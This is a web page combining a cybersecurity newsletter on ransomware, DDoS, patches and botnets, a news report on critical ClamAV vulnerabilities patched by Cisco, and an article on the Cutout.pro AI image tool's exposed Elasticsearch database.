It's scary to think that simply visiting a website could lead to a security breach. This is why it's essential to keep your devices updated with the latest security patches.

****2\. Don't Be the Next Victim: ESXiArgs Ransomware 💥 Strikes 500+ New European Targets****

In a recent discovery by cybersecurity firm Censys, more than 500 hosts have fallen victim to the ESXiArgs ransomware strain. Most of these compromised hosts are located in France, Germany, the Netherlands, the U.K., and Ukraine. What's particularly concerning is that Censys found two hosts with ransom notes dating back to mid-October 2022, shortly after ESXi versions 6.5 and 6.7 reached their end of life.

This means that the attackers behind ESXiArgs have been active for several months, and were able to gain a foothold in these hosts during a time when they were no longer receiving security updates or patches. It also shows that ransomware attacks can take a while to gain traction, and can often go undetected for months before they are discovered.

What's even more alarming is that the ransom notes on the two hosts were updated on January 31, 2023, with a revised version that matches the ones used in the current wave of attacks. This suggests that the attackers have been refining their tactics and improving their ransomware strain to make it more effective.

Ransomware attacks like ESXiArgs can be devastating for organizations, causing data loss, financial losses, and reputational damage. It's important for organizations to stay vigilant and ensure that their systems are always up to date with the latest security patches and updates.

Additionally, having a solid backup and disaster recovery plan can help organizations quickly recover from an attack and minimize its impact.

****3\. DDoS Attack Breaks Record - 71 Million 😮 Requests Per Second!****

Cloudflare, a web infrastructure company, has reported that they have successfully stopped a massive distributed denial-of-service (DDoS) attack. This attack, which peaked at over 71 million requests per second, is the largest HTTP DDoS attack that has been recorded so far, breaking the previous record of 46 million requests per second.

The attack was so large that Cloudflare has dubbed it a "hyper-volumetric" DDoS attack. The attack was targeted at websites that were secured by Cloudflare's platform, and it is believed that the attack originated from a botnet that was made up of more than 30,000 IP addresses from various cloud providers.

This attack is a reminder that DDoS attacks remain a significant threat to websites and online services, and it is crucial for companies to have robust security measures in place to protect against such attacks.

  
**Subscribe to our Daily Newsletters**

We hope you've been enjoying our weekly cybersecurity newsletter as much as we love making it informative and easy to understand. But, we also understand the importance of staying on top of the latest threats and vulnerabilities that can harm your digital life.

That's why we highly recommend subscribing to our daily news updates via email. You'll receive the latest cybersecurity news, insights, resources, offers and analysis straight to your inbox every day.

It's free – Subscribe Now!

****4\. Microsoft 🖥️ Releases Urgent Patches - Update Your Windows ASAP!****

Microsoft has been busy this week, releasing security updates to fix a whopping 75 vulnerabilities in its products. That's a lot of potential ways for cybercriminals to wreak havoc on our devices and systems!

Three of the flaws have already been exploited in the wild, so it's crucial that users update their software as soon as possible. In total, nine of the vulnerabilities are rated as Critical, which means they could allow attackers to take over a device remotely.

But wait, there's more! 37 of the flaws are what are known as remote code execution (RCE) vulnerabilities. These are particularly dangerous because they allow attackers to execute code on a victim's device without any interaction or permission.

So, if you're using any Microsoft products, it's best to update them as soon as possible.

****5\. Linux 🐧 and IoT Devices Under Attack by V3G4 Mirai Botnet****

A new variant of the infamous Mirai botnet has been spotted wreaking havoc in the world of Linux and IoT devices. This new version, dubbed V3G4 by the experts at Palo Alto Networks Unit 42, is making use of 13 security vulnerabilities to spread itself far and wide.

As we know, the Mirai botnet has a notorious history, having been responsible for several high-profile attacks in the past. This new variant only serves to underscore the importance of keeping our devices and systems up to date with the latest security patches and measures.

****6\. Your Favorite Apps Could be Carrying a Dangerous Virus - 🚨 Stay Alert!****

Cybercriminals have launched a new type of attack targeting Chinese-speaking individuals in Southeast and East Asia. Using rogue Google Ads, they are tricking people looking for popular applications like Google Chrome, WhatsApp, and Skype and directing them to fake websites that download malware onto their machines.

The attacks are particularly insidious because they use seemingly legitimate Google Ads to lure in victims. The malware being downloaded is a remote access trojan called FatalRAT, which gives the attackers complete control over the infected machine.

Security researchers are urging people to be cautious when downloading applications, especially from unfamiliar websites.

  
**The Hacker News / Upcoming Webinars**

Are you tired of falling victim to file-based threats and not knowing how to protect your sensitive data? Or are you struggling to keep up with the ever-evolving security challenges of SaaS applications?

Well, have no fear because we have two exciting webinars coming up that will help you bust some common myths and tackle the top security challenges of 2023!

*   Our first webinar, "**A MythBusting Special: 9 Myths about File-based Threats**", will help you separate fact from fiction when it comes to file-based threats. You'll learn the truth about what they are, how they work, and most importantly, how to prevent them from infiltrating your systems.
*   And if you're a fan of SaaS applications but find yourself grappling with security issues, then our second webinar, "**How to Tackle the Top SaaS Security Challenges of 2023**", is the one for you! Our experts will walk you through the most pressing security challenges of 2023, and provide practical tips to help you stay ahead of the game.

Both of these webinars are free and packed with valuable information that you won't want to miss. **So, don't wait - sign up now and join us for an informative and engaging cybersecurity discussion!**

Well folks, that's all for this week's cybersecurity newsletter.

As always, remember that cybersecurity is not just a one-time event or a quick fix. Whether it's using strong passwords, regularly updating your software, or staying aware of phishing scams, every small action can make a big difference in safeguarding your online security.  
So keep those firewalls up, keep those updates coming, and let's continue to stay curious, stay vigilant, and stay safe in the ever-changing digital landscape.

And above all, remember that cybersecurity is a community effort. We appreciate your readership and feedback and are always here to answer your questions and address your concerns. Please let us know if you have any suggestions for topics you'd like us to cover in future newsletters.

Thank you for joining us on this cybersecurity journey, and we look forward to sharing more insights and updates with you in the weeks ahead. Until next time, stay cyber-secure!

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

⚡Top Cybersecurity News Stories This Week — Cybersecurity Newsletter

Cisco has rolled out security updates to address a critical flaw reported in the ClamAV open source antivirus engine that could lead to remote code execution on susceptible devices.
Tracked as CVE-2023-20032 (CVSS score: 9.8), the issue relates to a case of remote code execution residing in the HFS+ file parser component.
The flaw affects versions 1.0.0 and earlier, 0.105.1 and earlier, and

Sysadmin / Endpoint Security

Cisco has rolled out security updates to address a critical flaw reported in the ClamAV open source antivirus engine that could lead to remote code execution on susceptible devices.

Tracked as CVE-2023-20032 (CVSS score: 9.8), the issue relates to a case of remote code execution residing in the HFS+ file parser component.

The flaw affects versions 1.0.0 and earlier, 0.105.1 and earlier, and 0.103.7 and earlier. Google security engineer Simon Scannell has been credited with discovering and reporting the bug.

"This vulnerability is due to a missing buffer size check that may result in a heap buffer overflow write," Cisco Talos said in an advisory. "An attacker could exploit this vulnerability by submitting a crafted HFS+ partition file to be scanned by ClamAV on an affected device."

Successful exploitation of the weakness could enable an adversary to run arbitrary code with the same privileges as that of the ClamAV scanning process, or crash the process, resulting in a denial-of-service (DoS) condition.

The networking equipment said the following products are vulnerable -

*   Secure Endpoint, formerly Advanced Malware Protection (AMP) for Endpoints (Windows, macOS, and Linux)
*   Secure Endpoint Private Cloud, and
*   Secure Web Appliance, formerly Web Security Appliance

It further confirmed that the vulnerability does not impact Secure Email Gateway (formerly Email Security Appliance) and Secure Email and Web Manager (formerly Security Management Appliance) products.

Also patched by Cisco is a remote information leak vulnerability in ClamAV's DMG file parser (CVE-2023-20052, CVSS score: 5.3) that could be exploited by an unauthenticated, remote attacker.

"This vulnerability is due to enabling XML entity substitution that may result in XML external entity injection," Cisco noted. "An attacker could exploit this vulnerability by submitting a crafted DMG file to be scanned by ClamAV on an affected device."

It's worth pointing out that CVE-2023-20052 does not affect Cisco Secure Web Appliance. That said, both vulnerabilities have been addressed in ClamAV versions 0.103.8, 0.105.2, and 1.0.1.

Cisco separately also resolved a denial-of-service (DoS) vulnerability impacting Cisco Nexus Dashboard (CVE-2023-20014, CVSS score: 7.5) and two other privilege escalation and command injection flaws in Email Security Appliance (ESA) and Secure Email and Web Manager (CVE-2023-20009 and CVE-2023-20075, CVSS scores: 6.5).

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical RCE Vulnerability Discovered in ClamAV Open-Source Antivirus Software

By Habiba Rashid
In total, the Cutout-owned Elasticsearch server leaked a whopping 9 GB worth of customer data.
This is a post from HackRead.com Read the original post: AI Image Editing Tool Cutout Leaked User Images and Data

Cutout, a popular AI image editing tool, suffered a data breach that exposed user images, usernames, and email addresses. The incident underscores the risks of using cloud-based AI tools for sensitive data.

Cutout.pro, a web-based AI image editing tool, was caught leaking 9GB worth of user data, which included usernames and images requested by using specific queries.

The discovery was made by Cybernews, who found an **open ElasticSearch instance** containing 22 million log entries referencing usernames, including individual users and business accounts.

However, since log entries contained duplicates, the total number of users affected is unclear. The instance also had information on the number of user credits, a virtual in-game currency, and links to Amazon S3 buckets, where generated images were stored.

This should not come as surprise since the use of AI-powered tools have skyrocketed. This is precisely due to the massive success of **ChatGPT**. So much so that Google was forced to release its own AI tool called **Bard AI**.

The exposed Elasticsearch cluster (Image: CyberNews)

The Hong Kong-based visual design platform allows users to manipulate photos or generate images using an AI-based application programming interface (API). This functionality enables the integration of the company’s services into third-party apps.

As noted by researchers, Cutout.pro has self-reported statistics of over 300 million API requests, 4,000 requests per second from over 5,000 applications and websites, and partnerships with over 25,000 businesses.

Therefore, the consequent impact of the leak is likely to be devastating for the customers whose data was exposed in the leak. According to the Cybernews **report**, their team also found two image editing apps in the open database: Vivid and AYAYA.

> “If Cutout.pro’s developers previously didn’t back up the data, the open instance could have led not only to the temporary denial of service but a permanent data loss that was stored on the open instance. Attackers could have wiped it out.”
> 
> Cyber News

Due to not being properly configured, the open instance could have been exploited by threat actors in multiple ways. The Cybernews team surmised that anyone could have performed CRUD (Create, Read, Update, and Delete) operations.

Attackers could have used the initial access point to enter the database, take control of the data, and pass it through Cutout.pro’s API, thus carrying out a dangerous supply chain attack on the company’s customers.

**Misconfigured Databases – Threat to Privacy**

As we know, misconfigured or unsecured databases have become a major privacy threat to companies and unsuspecting users. **In 2020**, researchers identified over 10,000 unsecured databases that exposed more than 10 billion (10,463,315,645) records to public access without any security authentication.

**In 2021**, the number of exposed databases increased to 399,200. The top 10 countries with the most database leaks due to misconfiguration in 2021 included the following:

*   USA – 93,685 databases
*   China – 54,764 databases
*   Germany – 11,177 databases
*   France – 9,723 databases
*   India – 6,545 databases
*   Singapore – 5,882 databases
*   Hong Kong – 5,563 databases
*   Russia – 5,493 databases
*   Japan – 4,427 databases
*   Italy – 4,242 databases

1.  **How AI-Powered Tools Spark Creativity**
2.  **Healthcare Firm ‘Doctors Me’ leaked Patient images**
3.  **Plastic surgery tech firm leaks images of 100k+ users**
4.  **New scam uses AI-generated images to fake law firm**
5.  **Breast Cancer Charity Exposed Images of U.S. Patients**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Tag

#google